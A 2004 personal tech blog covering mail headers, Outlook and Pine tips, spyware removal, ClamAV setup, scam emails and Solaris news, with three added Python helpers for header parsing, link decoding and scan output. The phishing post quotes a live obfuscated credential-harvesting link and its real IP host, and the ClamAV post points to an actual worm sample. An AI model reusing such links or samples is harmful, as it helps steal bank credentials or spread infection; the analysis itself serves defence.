
Fri, Dec 17, 2004 9:05 pm

The recipient was unavailable to take delivery of the message

A user received a bounced message with the following text when she sent an email:

Your message

   To:      mbgonzalez1@tfm.com.mx
   Subject: Receipt for Mr. Kniestedt
   Sent:    Fri, 17 Dec 2004 13:34:40 -0600

 did not reach the following recipient(s):

 Mayela Gonzalez B. on Fri, 17 Dec 2004 13:35:40 -0600
     The recipient was unavailable to take delivery of the message
       The MTS-ID of the original message is: c=es;a=
 ;p=tfm;l=MAIL0412171935Y7690HBL
     MSEXCH:MSExchangeMTA:TFM_MTY_PO2:TFM_MTY_DOM05

So what does "the recipient was unavailable to take delivery of the message" mean? The email address is correct. Otherwise, the Microsoft Exchange server at the recipient's end would have replied "The recipient name is not recognized". In this case, I believe it is because the recipient, Mayela Gonzalez, is over her quota for email on the Exchange server.

When a user is over quota and needs to delete some email, most other servers will respond with a message that clearly states the source of the problem, such as "the user has exceeded his quota" or something similar. The message from the Microsoft Exchange server, however, gives no immediately intelligible reason for the problem, but I believe it is because she is over her allotted storage space for messages on that server.

Unfortunately, I've encountered other cases, also, where Microsoft programs ought to provide you details the program clearly must know, so that you can immediately understand what is causing a problem, but instead they provide some vague message like the one in this bounced message. Why is the user "unavailable to take delivery of the message"? Has she gone to lunch? The program producing the error message must know why it can't deliver the message to her, but doesn't deign to provide the details that would make the source of the problem clear.

References:

  1. VirginiaTech Knowledge Base Article VTKB1005

[/network/email/exchange] permanent link

Thu, Dec 16, 2004 11:42 am

Viewing Message Headers in Outlook 2002

If you receive a spam message or anti-virus software on your system reports it detected a virus or worm in an incoming message, you can't rely on the "from" address to reveal the true origination point of the message. It is highly unlikely that such messages actually came from the user listed in the "from" address. Most spammers and mass-mailing worms use spoofed "from" addresses, i.e. addresses that are fictitious, real addresses that were found by a worm scanning an infected system for email addresses, addresses found by spam spiders, which are programs that search the web for valid email addresses posted on websites, or addresses that are likely to be valid on a domain, such as info, information, admin, administrator, root, etc.

Sending a reply message to the "from" address warning the user at that address that his or her system is infected with a virus or to complain about spam will likely be fruitless, since that user never sent you the spam or virus. So how can you determine where the message actually originated? By looking at the message headers. Most email clients commonly used on Windows systems hide the message headers from users by default, but, commonly, there are ways to still view the message headers.

In Outlook 2002, the procedure is as follows:

  1. Double-click on the message in Outlook to view it.
  2. Click on "View" and then "Options". A "Message Options" window appears with the Internet headers displayed at the bottom of the window.

If you want to copy those headers to an email message or file, click inside the "Internet headers" section, hit the Ctrl and A keys simultaneously to select the entire contents of that section or just click and drag with the mouse to highlight all of the information. Then hit the Ctrl and C keys simultaneously to copy the information into the Windows clipboard. Then inside an email message you are composing or a file you've opened, hit the Ctrl and V keys simultaneously to paste the information into the message or file.

Scrolling through the message headers will reveal the origination point of a message. Don't expect to find an email address associated with the true sender, but the headers will show the Internet Protocol (IP) address of the sending system and path the message took from that system to your system.

[/os/windows/office/outlook] permanent link

Tue, Dec 14, 2004 1:43 am

Reducing the size of a Portable Document Format (PDF) file in Acrobat 6.0

To reduce the size of a PDF file in Adobe Acrobat 6.0, take the following steps:
  1. Click on File.
  2. Click on Reduce File Size.
  3. Select the desired compatibility. You have three options:
    • Adobe Acrobat 4.0 and later
    • Adobe Acrobat 5.0 and later
    • Adobe Acrobat 6.0 and later
    Selecting a later version will allow a greater reduction in file size, but will necessitate others viewing the file to have that version. Selecting an earlier version will provide greater compatibility, but a smaller reduction in file size.

When you are working with a PDF file, you can also reduce the size of the file by choosing Save As and then overwriting the file you opened. When you choose Save As, Acrobat will save the file as efficiently as possible, whereas when you choose Save, changes are appended to the file, which may make it larger. Acrobat will also optimize a document for "Fast Web View" when you use Save As, allowing the document to be downloaded one page at a time from a Web server, which will reduce the time it takes to view it.

You can see the size of the file in Acrobat by clicking on File and then Document Properties. Under the "Description" section, in addition to the file size, you will also see the PDF version listed, which will tell you what version of Acrobat others will need to view the file.

References:

    Reduce PDF file size

[/os/windows/software/pdf] permanent link

Wed, Dec 01, 2004 3:41 pm

Repairing Outlook PST File Corruption at 2 GB Limit

Outlook 2000 and earlier versions put all messages, attachments, contact lists, the calendar, etc. in one file. There are advantages and disadvantages to that approach. But Microsoft's Outlook developers coded the software in such a way that when that file size nears 2 gigabytes (GB), the file becomes corrupt. And Outlook provides no forewarning that one is nearing the 2 GB limit. Once you reach about 1.96 GB the file becomes corrupted and you may not even be able to start Outlook.

Microsoft's Inbox Repair Tool, scanpst.exe, can't repair the damage. The only repair mechanism Microsoft provides is the Oversize PST Recovery Tool, PST2GB. That tool will arbitrarily truncate the PST file to less than 2 GB, which then allows it to be repaired with the Inbox Repair Tool. However, you have no control over what data is removed by the truncation process, so some messages will be lost.

For instructions on how to repair a file that has reached the limit, see Repairing Outlook PST File Corruption at 2 GB Limit.

[/os/windows/office/outlook] permanent link

Mon, Nov 15, 2004 11:29 pm

Configuring Pine to Display Message Headers

Pine will show you the "Date", "From", "To", and "Subject" of a message in addition to the message's contents. But you may wish to view the full message headers to see the "Message-ID" or the "Received" headers. The Received headers allow you to view the path of a message from an originating system to your mail server. They are useful in determining if a message actually came from the purported originator, since spammers and worms often use fake "From" addresses.

Pine allows you to display the full message headers using the "H" command. But, if you hit "H" and you see the message "[Command "h" not defined for this screen. Use ? for help]", then the command hasn't been enabled. To enable the command so that you can use "H" to toggle the display of full message headers, take the following steps.

  1. At Pine's main menu, which is shown below, hit the "S" key for "Setup".

      PINE 4.33   MAIN MENU                         Folder: INBOX  3,280 Messages
    
    
              ?     HELP               -  Get help using Pine
    
              C     COMPOSE MESSAGE    -  Compose and send a message
    
              I     MESSAGE INDEX      -  View messages in current folder
    
              L     FOLDER LIST        -  Select a folder to view
    
              A     ADDRESS BOOK       -  Update address book
    
              S     SETUP              -  Configure Pine Options
    
              Q     QUIT               -  Leave the Pine program
    
    
    
    
       Copyright 1989-2001.  PINE is a trademark of the University of Washington.
    
    ? Help                     P PrevCmd                 R RelNotes
    O OTHER CMDS > [ListFldrs] N NextCmd                 K KBLock
    

  2. At the next menu, shown below, hit the "C" key to configure Pine.

    This is the Setup screen for Pine. Choose from the following commands:
    
    (E) Exit Setup:
        This puts you back at the Main Menu.
    
    (P) Printer:
        Allows you to set a default printer and to define custom
        print commands.
    
    (N) Newpassword:
        Change your password.
    
    (C) Config:
        Allows you to set many features which are not turned on by default.
        You may also set the values of many options with that command.
    
    (S) Signature:
        Enter or edit a custom signature which will
        be included with each new message you send.
    

  3. Scroll down through the list that appears using the cursor keys on your keyboard (or you can move up and down the list with "n" for "next" or "p" for "previous") until you find "enable-full-header-cmd" under "Advanced Command Preferences". When you've found it, hit "x" to set the value ("x" toggles values off and on). Then hit "E" to exit setup. When prompted "Commit changes ("Yes" replaces settings, "No" abandons changes)?", hit "y" to save your changes. Now when you view a message, you can just hit the "h" key to toggle the display of a message's headers on and off.
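Once the full headers are visible, in Pine as here or in Outlook as in the earlier post, the Received lines can be read mechanically. The following is an added example, not part of the original posts: it parses a constructed message and reports the address recorded by the outermost relay you trust, since anything below that line was supplied by the sending side. The host names, addresses and the TRUSTED_RELAYS set are assumptions made for the illustration.

```python
import email
import ipaddress
import re

# Constructed sample (not from the original post). Names use example.*
# domains and the addresses come from the RFC 5737 documentation ranges.
RAW_MESSAGE = """\
Received: from mx.example.net (mx.example.net [198.51.100.7])
\tby mail.example.org (8.12.11/8.12.11) with ESMTP id iBGGfX01
\tfor <user@example.org>; Thu, 16 Dec 2004 11:41:33 -0500
Received: from unknown-host (dsl-45.example.com [203.0.113.45])
\tby mx.example.net (Postfix) with SMTP id 4F2A1
\tfor <user@example.org>; Thu, 16 Dec 2004 11:41:30 -0500
Received: from mail.bank.example ([192.0.2.10])
\tby unknown-host with SMTP; Thu, 16 Dec 2004 11:40:00 -0500
From: "Support" <support@bank.example>
To: user@example.org
Subject: Important notice

Body text.
"""

# Hypothetical: the mail servers you operate or trust to record honestly.
TRUSTED_RELAYS = {"mail.example.org", "mx.example.net"}

FROM_RE = re.compile(r"^from\s+(\S+)", re.IGNORECASE)
BY_RE = re.compile(r"\bby\s+(\S+)", re.IGNORECASE)
IP_RE = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f:.]+)\]")


def parse_received(value):
    """Split one Received header into claimed name, peer IP and recorder."""
    flat = " ".join(value.split())  # undo header folding
    claimed = FROM_RE.search(flat)
    recorder = BY_RE.search(flat)
    ip = None
    bracketed = IP_RE.search(flat)
    if bracketed:
        try:
            ip = str(ipaddress.ip_address(bracketed.group(1)))
        except ValueError:
            ip = None  # bracketed text was not an IP address
    return {
        "claimed_name": claimed.group(1) if claimed else None,
        "ip": ip,
        "recorded_by": recorder.group(1).rstrip(";") if recorder else None,
    }


def received_hops(raw):
    """Return the hops newest first, the order they appear in the message."""
    msg = email.message_from_string(raw)
    return [parse_received(v) for v in msg.get_all("Received", [])]


def origin_ip(raw, trusted):
    """Return the peer IP recorded by the outermost trusted relay.

    Each server prepends its own Received line, so every line below the
    last one written by a trusted relay came from the sending side and
    can be forged.
    """
    origin = None
    for hop in received_hops(raw):
        if hop["recorded_by"] not in trusted:
            break
        origin = hop["ip"]
    return origin


if __name__ == "__main__":
    for hop in received_hops(RAW_MESSAGE):
        trusted = hop["recorded_by"] in TRUSTED_RELAYS
        print(f'{str(hop["recorded_by"]):18} <- {str(hop["ip"]):15} '
              f'claimed={hop["claimed_name"]} '
              f'{"trusted" if trusted else "unverified"}')
    print("connecting address:", origin_ip(RAW_MESSAGE, TRUSTED_RELAYS))
```
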

    [/network/email/clients/pine] permanent link

Sun, Nov 14, 2004 3:42 pm

LocalNRD Removal

While running adware/spyware checks on a system today I found Bazooka Scanner reported LocalNRD on the system. I wasn't able to remove it through "Add/Remove Programs", but instead had to manually remove the remnants of this malware. I've created a registry file to remove the registry entries Bazooka associates with this malware and a batch file to remove the file associated with it.

Instructions for removing LocalNRD

[/security/spyware/localnrd] permanent link

Fri, Nov 12, 2004 12:20 pm

AOL Tells Broadband Customers to Find New ISP

The ABC News website has an article today stating that America Online (AOL), (I think Ads Online might be a more accurate name), is telling its broadband customers in nine southern states that it will no longer be able to provide broadband service to them. Customers have until January 17, 2005 to find another broadband provider. If they remain with AOL, they will be converted to AOL's dialup service. And AOL spokesperson Anne Bentley is quoted as stating that she expects AOL will phase out broadband service to the rest of its customers over the next year.

I've read other reports that AOL is experiencing financial problems and a declining subscriber base, which doesn't surprise me. I used to suggest AOL to people who had no prior experience with computers or whose computer knowledge was very limited. And when I was helping a family member run a mailing list devoted to anime, I maintained an AOL account so that I could help mailing list members who were AOL members. Many would join the list, but then be unable to receive email, because their AOL account was configured to block email from addresses outside AOL. With the AOL account, I could send them a message advising them how they could change their AOL settings.

AOL did make it fairly easy to get on-line, chat, and send email even for people who were computer illiterate. But over time, I decided AOL wasn't even a good choice for computer novices. Other ISPs improved the packaging of their service and support for novice users, but didn't bombard users with ads whenever they went on-line. And after dealing with AOL's customer service, I came to the conclusion it was awful.

AOL started popping up ads to create a second AOL account when you went on-line. A family member inadvertently created a second account, though she didn't realize she had done so. When I saw the second billing, I called AOL. I was told a second account had been created. I told the representative I spoke to we didn't want it and I wanted that account canceled. I was told the account was canceled. The next month I was again billed for the second account. I called again and was again assured the account was canceled. The following month I was again billed for a second account. I called again and spoke to an AOL representative who said she was checking on the account and then switched me to a telemarketer when she put me on hold. It was bad enough when they put me on hold and forced me to listen to marketing offers while I was on hold, but getting switched to some telemarketing partner of AOL was infuriating. I called back and demanded to speak to a supervisor. I was told the second account would be deleted, but next month I was again billed. On my next call, I was told that "yes" the second account would finally be deleted, but they couldn't credit my credit card for the billings for the previous months. Instead they would give me a credit for extra months on the first account, which I had switched to AOL's $4.95 limited service, which I only kept to assist mailing list members. Billing for the second account finally stopped, but at that point, I didn't feel I could ever recommend AOL to anyone. And with such lousy customer service, it doesn't surprise me AOL is losing customers. I think AOL's chances of still existing in another five years aren't good.

[/network/Internet/ISP] permanent link

Thu, Nov 11, 2004 11:03 pm

Bubba.WinTools Removal

While running adware/spyware checks on a system tonight, I found Bazooka Scanner reported Bubba.Wintools on the system. I wasn't able to remove it through "Add/Remove Programs", but instead had to manually remove the remnants of this malware. I've created a registry file to remove the registry entries Bazooka associates with this malware and a batch file to remove the files associated with it.

Instructions for removing Bubba.Wintools

[/security/spyware/bubba-wintools] permanent link

Tue, Nov 09, 2004 12:43 am

SunTrust Banks Scam

I received an email today, purportedly from SunTrust Banks, Inc. which was actually a phishing scam. The message had a "from" address of "Suntrust Bank " and a subject of "SunTrust Bank SECURE VERIFICATION PROCESS". The message had a GIF image, chinaman.GIF, embedded in it.

Clicking on the link in the message opens another window where the mark is expected to fill in the following fields:

ATM/Debit Card
PIN-code
Expiration date
CVV2 (the three-digit code on the back of a credit card)
Login Name
Password
E-mail Address

To view a snapshot of that window, click here or to view the window as activated by the HTML code, click here. Submitting the form yields a "Thank you for confirmation" message.

In Internet Explorer, when you move your cursor over the link in the email message, you see http://www.suntrust.com/personal/Checking/OnlineBanking/Internet_Banking/security.asp, which is a real SunTrust webpage, but the real URL to which you will be taken is shown below:

http://%32%30%33%2e%31%39%38%2e%32%31%30%2e%31%35%36:%38%37/%73%74/%69%6E%64%65%78%2E%68%74%6D

The author of this scam is using an obfuscated URL to make it less likely potential marks will see through the scam. Obfuscated URLs can be unobfuscated using tools provided at various websites. Putting in the above URL at http://javascript.internet.com/equivalents/url-revealer.html reveals a more intelligible URL, http://203.198.210.156:87/s/t/index.htm, which is more obviously not a SunTrust website address.

The source code for the message shows the obfuscation. The HTML code can be downloaded here.
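The same unmasking can be done offline. The following is an added example, not code from the original post: it percent-decodes the link target quoted above and lists the traits that mark it as suspect. The flag names are this example's own labels.

```python
import ipaddress
import re
import string
from urllib.parse import unquote, urlsplit

# Both URLs are the ones quoted in the post above.
SHOWN = ("http://www.suntrust.com/personal/Checking/OnlineBanking/"
         "Internet_Banking/security.asp")
ACTUAL = ("http://%32%30%33%2e%31%39%38%2e%32%31%30%2e%31%35%36:%38%37"
          "/%73%74/%69%6E%64%65%78%2E%68%74%6D")

DEFAULT_PORTS = {"http": 80, "https": 443}
# Characters that never need percent-encoding in a URL (RFC 3986).
UNRESERVED = set(string.ascii_letters + string.digits + "-._~")
ESCAPE_RE = re.compile(r"%([0-9A-Fa-f]{2})")


def hides_plain_chars(text):
    """True if text percent-encodes characters that never need encoding."""
    return any(chr(int(h, 16)) in UNRESERVED for h in ESCAPE_RE.findall(text))


def is_ip_literal(host):
    """True if host is a bare IPv4 or IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def reveal(actual, shown=None):
    """Decode a link target and flag traits typical of a disguised link.

    `actual` is the real target; `shown` is the URL the reader sees.
    """
    parts = urlsplit(actual)
    scheme = parts.scheme.lower()
    # Decode host and path separately so an encoded "/" or ":" in one
    # component cannot change where the other begins.
    netloc = unquote(parts.netloc)
    authority = urlsplit(f"{scheme}://{netloc}")
    host = (authority.hostname or "").lower()
    try:
        port = authority.port
    except ValueError:
        port = None  # port text was not a valid number
    url = f"{scheme}://{netloc}{unquote(parts.path)}"
    if parts.query:
        url += "?" + parts.query

    flags = []
    if ESCAPE_RE.search(parts.netloc):
        flags.append("encoded-host")
    if hides_plain_chars(parts.path):
        flags.append("encoded-plain-path")
    if is_ip_literal(host):
        flags.append("ip-literal-host")
    if port is not None and port != DEFAULT_PORTS.get(scheme):
        flags.append("non-default-port")
    if shown:
        shown_host = (urlsplit(shown).hostname or "").lower()
        if shown_host and shown_host != host:
            flags.append("shown-host-mismatch")
    return {"url": url, "host": host, "port": port, "flags": flags}


if __name__ == "__main__":
    result = reveal(ACTUAL, SHOWN)
    print(result["url"])
    print(", ".join(result["flags"]))
```
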

[/security/scams/phishing/suntrust] permanent link

Fri, Nov 05, 2004 8:58 pm

Release of Open-Source Solaris May Not Occur by the End of 2004

Glenn Weinberg, vice president of Sun's operating platforms group, is quoted in a ZDNet article, Open-source details hold up Solaris release, as indicating that details on Sun's open-source version of Solaris may not be finalized by the end of the year. "It'll be really close," Weinberg told reporters. According to Sun president Jonathan Schwartz, Sun has not ruled out releasing Solaris under a GPL license.

Sun is discussing their plans with open-source representatives at the Open Source Initiative, though Eric Raymond, president of the Open Source Initiative, has stated those communications have been unofficial.

[/os/unix/solaris] permanent link

Mon, Nov 01, 2004 11:11 am

Open Solaris Getting Closer

There is an article, Sun Ready to Open Solaris, in eWEEK dated November 1, 2004 by Peter Galli stating that Sun is getting closer to releasing Open Solaris, an open-source version of their Solaris operating system. The article states that Sun is starting with a pilot/beta program for Open Solaris. The article also states that Sun is getting close to finalizing pricing for Solaris 10.

Though, in another September 22 eWEEK article, When Open-Source Claims Fall Flat, Steven J. Vaughan-Nichols wonders about when Sun will actually make Open Solaris available. He also implores Sun not to come up with yet another variant of an "open-source" licensing model. He has also written another eWEEK article, Analysts Question Sun's Open-Source Solaris Plans, published in eWEEK on September 21, on the implications of the licensing scheme that Sun may adopt for open Solaris.

He is critical of Microsoft's "shared source" scheme, another effort by Microsoft to combat the open-source movement which threatens its revenue stream.

[/os/unix/solaris] permanent link

Tue, Oct 26, 2004 1:05 pm

Windows XP Keyboard Shortcuts

Keyboard shortcuts available to you in Windows XP include those listed below. Press the Windows logo key, which you will find next to the Alt keys on newer PC keyboards (the Windows logo key doesn't exist on older keyboards) and the listed second key to use the shortcut.

Open the Start menu
L Lock the computer, if your computer is a domain member
E Explore My Computer
M Minimize all open Windows
F Open the Search window (think of "F" for "Find")
F1 Open Help and Support Center

[/os/windows/xp] permanent link

Wed, Oct 20, 2004 9:12 pm

HotJava 3.0

I upgraded Netscape on a Solaris 2.7 system only to find that I then would receive a "bus error" message every time I started Netscape. I was unable to find a solution to the problem, so I looked for alternative GUI browsers, but, unfortunately, almost every one I found required version 8 or higher of the Solaris operating system. I thought I might be able to use Mozilla, but the requirements listed for it indicated Solaris 8 or higher is needed.

I tried Opera, but that didn't work. I thought I might even be able to use Internet Explorer on the system. From some websites I visited, it appeared that Microsoft went up to a 5.0 version of Internet Explorer for Unix, but Microsoft is no longer making any Unix version of Internet Explorer available for download.

The system had Sun's HotJava browser on it. But that was version 1.0.2 and it didn't work very well for most websites I visited. Fortunately, Sun does make available a much later version, version 3.0, which will run on the Solaris 2.7 operating system. That version is available from Sun at http://java.sun.com/products/archive/hotjava/3.0/index.html.

To install the software, make the file executable and then run the program from the command line, which will open an InstallAnywhere window.

chmod +x hjb3_0-solsparc-jre.bin
./hjb3_0-solsparc-jre.bin

When I first attempted to install the software, I had logged into the system under a user account and then used su to become root from a terminal console window. I would see "InstallAnywhere is preparing to install..." appear and then the installation would appear to hang. When I logged out and back in as root and ran the program again, I saw the window appear that allowed me to proceed with the installation.

If you accept the default installation directory, the program will be installed in /HotJava. Sun reports there is a bug that may affect you if you choose an alternate installation directory:

(Solaris systems) If you run the install program as root, and the default install location (/HotJava) does not already exist, the "Select a Folder" dialog box for choosing a different install folder does not come up when you click the Choose button. At this point, the Choose button becomes permanently disabled.

You can continue the installation in either the default /HotJava directory or in an alternate directory you type in the text field containing the default installation directory. (bug id 4229644)

If you chose the default installation directory, you can run the program by typing /HotJava/hotjava. If you just type hotjava, you will still get the older version, which is in /usr/dt/bin/hotjava, unless you set up a symbolic link or alias to point to the new version.

One serious limitation of the browser is that it does not support secure connections using the https protocol. So you will not be able to use it to access any webpages requiring secure transmission of data between a browser and a web server. I installed a fairly old version of Netscape Communicator, version 4.05, which Sun provided with Solaris 7, to be able to access secure webpages. The browser also can't display png images.

[/os/unix/solaris] permanent link

Fri, Oct 08, 2004 5:20 pm

Dell Recalls Laptop Power Adapters

Dell is recalling power adapters for some of its Latitude, Precision, and Inspiron laptops due to the possibility that the adapters may overheat, posing a risk of fire or electrical shock. The adapters being recalled have "P/N 9364U," "P/N 7832D" or "P/N 4983D" and Dell's name on them. Dell is offering a free replacement adapter for the defective adapters. See CPSC, Dell Inc. Announce Recall of AC Adapters for Notebook Computers or www.delladapterprogram.com for further details, though the latter site is returning a "Service Unavailable" message at the moment.

There was a prior recall of Dell Combination Auto/Air Adapters sold with Dell Latitude X300, D400, D500, D505, D600 and D800, Inspiron 300m, 500m, 510M, 600m, I8500, I8600 and Precision M60 laptops sold between December 2003 and May 2004. Those adapters pose the risk of electrical shock to users. Those adapters have "DELL" and "Dell P/N W1451" printed on the top of the adapters. For details on that recall see www.auto-air-adapter.com or the Dell Combination Auto-Air Power Adapter Retrofit Program webpage.

References:

Part Numbers 9364U, 7832D, and 4983D Recall

  1. Dell recalls laptop power supplies
  2. CPSC, Dell Inc. Announce Recall of AC Adapters for Notebook Computers
  3. Dell Adapter Program

Part Number W1451 Recall

  1. Dell Recalls Portable Power Adapters
  2. Dell Combination Auto-Air Power Adapter Retrofit Program
  3. Dell Recalls Notebook Power Adapters
  4. Dell Important Safety Advisory

[/pc/hardware/power-supply] permanent link

Wed, Sep 29, 2004 5:51 pm

Jubril Udeh Scam

I received a variant of the "pose as some deceased tycoon's next of kin and get rich" email messages today. This one purports to be from "Jubril Udeh Manager of Credit and Accounts Department of North Atlantic Securities Sarls Lome-Togo Republic" in regards to millions that belonged to the now deceased "Mr Levy Shimony a Lebanese Import and Export Tycoon here in Lome Togo." The message was purportedly sent to me because of my "high repute and trust worthiness", characteristics one supposes make me an ideal partner for participating in a fraudulent scheme where I would pose as the deceased's next of kin.

Are there people foolish enough to fall for such ruses? Unfortunately, the answer is "yes". There have apparently been quite a few people who have fallen for such scams. One I read about was an accountant for a law office who used her employer's funds to cover the scammer's "transaction fees". She apparently thought she could cover the money she took from her employer out of the large sum of money she was sure to receive. What she did receive was a prison sentence, since, of course, no funds were forthcoming from the scammer.

One recipient of one of these messages decided to scam the scammer. He actually got the scammer to send him money, which he donated to charity. For an amusing tale of how this scambaiter got the scammer to join his "Holy Church of The Order of The Red Breast", see The Tale of The Painted Breast.

[/security/scams] permanent link

Fri, Sep 24, 2004 3:15 pm

Example Virus Messages

Examples of messages containing various worms, viruses, and trojans.

[/security/viruses] permanent link

Thu, Sep 23, 2004 7:32 pm

BHODemon

Adware/spyware may insert itself on your system using a Browser Helper Object (BHO). One tool that can show you the BHOs that are enabled on your system is BHODemon from Definitive Solutions.

See Installing and Using BHODemon for additional download links and information on installing and using the program.

[/security/spyware] permanent link

Mon, Sep 20, 2004 1:13 am

Clam Antivirus (ClamAV)

A free antivirus package for Linux systems, Clam Antivirus, is available from http://www.clamav.net/.

I downloaded the Clam AntiVirus package with wget http://crash.fce.vutbr.cz/crash-hat/2/clamav/clamav-0.75.1-1.i386.rpm . I then installed the package on a mail server running Fedora Core 2 Linux.

rpm --install clamav-0.75.1-1.i386.rpm
warning: clamav-0.75.1-1.i386.rpm: V3 DSA signature: NOKEY, key ID 6cdf2cc1

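The NOKEY warning means rpm could not check the package's signature because the signing key (ID 6cdf2cc1) is not in its keyring. The warning message can be prevented by importing that key with the command rpm --import http://crash.fce.vutbr.cz/Petr.Kristof-GPG-KEY prior to installing the package, which also lets rpm verify the signature.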

To use up2date to update the package, add the lines below to /etc/sysconfig/rhn/sources if you are using Fedora Core 1. You can add them after the other yum lines:

yum crash-hat http://crash.fce.vutbr.cz/crash-hat/1
#yum crash-test http://crash.fce.vutbr.cz/crash-hat/testing/1

If you are using Fedora Core 2, use the lines below:

yum crash-hat http://crash.fce.vutbr.cz/crash-hat/2
#yum crash-test http://crash.fce.vutbr.cz/crash-hat/testing/2

Otherwise, you will get the error message below when you try up2date clamav:

The following packages you requested were not found:
clamav

Once you have added the line to /etc/sysconfig/rhn/sources, you can then use up2date -u clamav to update the software to a later version when one becomes available.

If you are using another version of Linux, see http://www.clamav.net/binary.html#pagestart for information. Clam AntiVirus will run on other operating systems as well. Supported platforms are listed below (tested platforms in parentheses):

Some features may not be available on all operating systems.

If you install the package with the rpm or up2date commands, a new group and a new user account will be created, both named clamav. The clamav configuration file will be located in /etc/clamav.conf. The virus database updater program is called "freshclam". Freshclam's configuration file is /etc/freshclam.conf. You can control how often freshclam checks for new virus signatures by adjusting the Checks value in the /etc/freshclam.conf file. The log file for clamav is /var/log/clamav/clamd.log and the log file for freshclam is in /var/log/clamav/freshclam.log.

The program doesn't start automatically when you install it with the rpm or up2date commands. You can start it with /etc/init.d/clamd start or by rebooting the system.

If you left the TCP listening port to be the default of 3310, you can see whether it is running by using the netstat command netstat -at | grep 3310. You should see the system is listening for connections on that port.

tcp        0      0 *:3310                  *:*                     LISTEN

Or you can use the ps command to check on whether it is running:

[root@mail root]# ps aux | grep clamd | grep -v "grep"
clamav    2315  0.0  6.1 18024 15628 ?       S    00:13   0:00 /usr/sbin/clamd

You can use the clamscan command to scan a directory or file for viruses. E.g. a scan of the files in the directory where clamav test files are stored might produce output such as that shown below:

[root@mail root]# clamscan /usr/share/doc/clamav-0.75.1/test
/usr/share/doc/clamav-0.75.1/test/test-failure.rar: RAR module failure
/usr/share/doc/clamav-0.75.1/test/test-failure.rar: OK
/usr/share/doc/clamav-0.75.1/test/README: OK
/usr/share/doc/clamav-0.75.1/test/test.bz2: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test.zip: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test-zip-noext: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test.msc: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test.rar: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test: ClamAV-Test-Signature FOUND

----------- SCAN SUMMARY -----------
Known viruses: 24009
Scanned directories: 1
Scanned files: 8
Infected files: 6
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 5.640 sec (0 m 5 s)

The files in the clamav test directory are actually harmless, but the scan shows you the clamav scanning program is working. If you want to test with an actual worm, you can use the following example of Worm.SomeFool.P, aka W32.Netsky.P@mm.

Worm.SomeFool.P

If you want to scan just a particular file, you can put the file name after the command, e.g. clamscan corrected_doc.pif.

If you wish to manually update the virus definitions, issue the command freshclam.
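When clamscan runs unattended, its report has to be read by a program rather than by eye. The following is an added example, not part of the original post or of ClamAV: it parses the test-directory output shown earlier, separates detections from clean files, and checks the totals against the scan summary. Treating a file that reports a module failure and then OK as not inspected is this example's reading of that output, not documented ClamAV behaviour.

```python
# Output copied from the clamscan listing earlier in the post.
SAMPLE_OUTPUT = """\
/usr/share/doc/clamav-0.75.1/test/test-failure.rar: RAR module failure
/usr/share/doc/clamav-0.75.1/test/test-failure.rar: OK
/usr/share/doc/clamav-0.75.1/test/README: OK
/usr/share/doc/clamav-0.75.1/test/test.bz2: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test.zip: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test-zip-noext: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test.msc: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test.rar: ClamAV-Test-Signature FOUND
/usr/share/doc/clamav-0.75.1/test/test: ClamAV-Test-Signature FOUND

----------- SCAN SUMMARY -----------
Known viruses: 24009
Scanned directories: 1
Scanned files: 8
Infected files: 6
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 5.640 sec (0 m 5 s)
"""


def parse_clamscan(output):
    """Sort per-file result lines into infected, clean and unchecked."""
    body, _, tail = output.partition("SCAN SUMMARY")
    infected = {}   # path -> signature name
    unchecked = {}  # path -> failure message
    ok_paths = []
    for line in body.splitlines():
        # Split on the last ": " so a path containing one still parses.
        path, sep, status = line.strip().rpartition(": ")
        if not sep:
            continue  # blank line or the dashes before the summary
        if status.endswith(" FOUND"):
            infected[path] = status[: -len(" FOUND")]
        elif status == "OK":
            ok_paths.append(path)
        else:
            unchecked[path] = status
    # An OK printed for a file whose unpacker failed says nothing about
    # the archive's contents, so it is not counted as clean.
    clean = [p for p in ok_paths if p not in unchecked]

    summary = {}
    for line in tail.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            summary[key.strip()] = value.strip()
    return {"infected": infected, "clean": clean,
            "unchecked": unchecked, "summary": summary}


def summary_matches(report):
    """Check the parsed per-file lines against clamscan's own totals."""
    summary = report["summary"]
    files_seen = (len(report["infected"]) + len(report["clean"])
                  + len(report["unchecked"]))
    return (int(summary["Infected files"]) == len(report["infected"])
            and int(summary["Scanned files"]) == files_seen)


if __name__ == "__main__":
    report = parse_clamscan(SAMPLE_OUTPUT)
    for path, name in report["infected"].items():
        print("INFECTED ", path, name)
    for path, reason in report["unchecked"].items():
        print("UNCHECKED", path, reason)
    print("summary consistent:", summary_matches(report))
```
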

Clam AntiVirus 0.75.1-1 Package and Download Information

Milter package for use with sendmail
Clam AntiVirus 0.75.1-1 Milter Package and Download Information

[/security/antivirus/clamav] permanent link

Sun, Sep 19, 2004 8:58 pm

Logrotate PPP Error

After first setting up a Linux server with Fedora Core 2 Linux, I received the following error message in an email message sent to root:

Date: Sun, 12 Sep 2004 19:00:42 -0400
From: root@mail.somewhere001.us (Anacron)
To: root@mail.somewhere001.us
Subject: Anacron job 'cron.daily'

/etc/cron.daily/logrotate:

error: stat of /var/log/ppp/connect-errors failed: No such file or directory

According to Bugzilla Bug 126771: logrotate error because of non-existent /var/log/ppp/connect-errors this error can be prevented by adding a missingok to /etc/logrotate.d/ppp. The problem occurs if PPP isn't used, which means there won't be a log file for it in /var/log/ppp. By adding the missingok to /etc/logrotate.d/ppp, you indicate that an error message shouldn't be produced if the log file is missing and so can't be rotated.

According to Bug 122911 - Logrotate problem if ppp isn't used and there isn't a logfile in /var/log, the problem is present in version 2.4.2 release 2 of the ppp package. I didn't add the missingok line, but instead upgraded the ppp package (use up2date --install ppp). I now have version 2.4.2 release 3.FC2.1 of ppp, which added the missingok line.

